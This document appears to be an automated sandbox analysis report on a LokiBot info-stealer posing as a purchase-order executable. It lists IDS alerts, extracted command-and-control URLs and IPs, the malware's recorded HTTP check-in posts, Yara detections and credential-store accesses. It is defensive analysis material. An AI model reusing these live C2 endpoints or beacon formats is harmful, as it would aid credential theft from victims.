              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49864 -> 104.223.93.105:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49864 -> 104.223.93.105:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractor URLs: http://kbfvzoboss.bid/alien/fre.php
              Source: Malware configuration extractor URLs: http://alphastand.trade/alien/fre.php
              Source: Malware configuration extractor URLs: http://alphastand.win/alien/fre.php
              Source: Malware configuration extractor URLs: http://alphastand.top/alien/fre.php
              Source: Joe Sandbox View ASN Name: ASN-QUADRANET-GLOBALUS
              Source: Joe Sandbox View IP Address: 104.223.93.105
              Source: global traffic HTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AF753E12 Content-Length: 190 Connection: close
              Source: global traffic HTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AF753E12 Content-Length: 163 Connection: close
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 14 Jan 2022 06:15:13 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 14 Jan 2022 06:15:14 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: Purchase Order #5000012803.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: Purchase Order #5000012803.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: Purchase Order #5000012803.exe, Purchase Order #5000012803.exe, 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, Purchase Order #5000012803.exe, 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.ibsensoftware.com/
              Source: unknown HTTP traffic detected: POST /slimfit/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: slimpackage.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: AF753E12 Content-Length: 190 Connection: close
              Source: unknown DNS traffic detected: queries for: slimpackage.com
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 1_2_00404ED4 recv,1_2_00404ED4
              Source: Purchase Order #5000012803.exe, 00000000.00000002.668485739.00000000007BA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exe Code function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Loki Payload Author: kevoreilly
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: Purchase Order #5000012803.exe
              Executable has a suspicious name (potential lure to open the executable)
              Source: Purchase Order #5000012803.exeStatic file information: Suspicious name
              Source: Purchase Order #5000012803.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.1.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 0.2.Purchase Order #5000012803.exe.22d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.0.Purchase Order #5000012803.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 1.2.Purchase Order #5000012803.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.666925376.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000001.668011925.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.667586027.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.663293606.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000000.00000002.668687663.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000000.664122466.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403225
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_0040604C0_2_0040604C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_004047720_2_00404772
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_0040549C1_2_0040549C
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_004029D41_2_004029D4
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: String function: 0041219C appears 45 times
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: String function: 00405B6F appears 42 times
              Source: Purchase Order #5000012803.exe, 00000000.00000003.659919332.00000000033DF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order #5000012803.exe
              Source: Purchase Order #5000012803.exe, 00000000.00000003.662407150.0000000003246000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order #5000012803.exe
              Source: Purchase Order #5000012803.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Purchase Order #5000012803.exeReversingLabs: Detection: 25%
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Users\user\Desktop\Purchase Order #5000012803.exe
              Source: Purchase Order #5000012803.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeProcess created: C:\Users\user\Desktop\Purchase Order #5000012803.exe "C:\Users\user\Desktop\Purchase Order #5000012803.exe"
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile created: C:\Users\user\AppData\Local\Temp\nsgB0C.tmp
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/6@61/1
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\Purchase Order #5000012803.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
              Source: Binary string: wntdll.pdbUGP source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp
              Source: Binary string: wntdll.pdb source: Purchase Order #5000012803.exe, 00000000.00000003.663596195.00000000032C0000.00000004.00000001.sdmp, Purchase Order #5000012803.exe, 00000000.00000003.663359246.0000000003130000.00000004.00000001.sdmp

              Data Obfuscation:

              Yara detected aPLib compressed binary
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.0.Purchase Order #5000012803.exe.400000.6.unpack, type: UNPACKEDPE
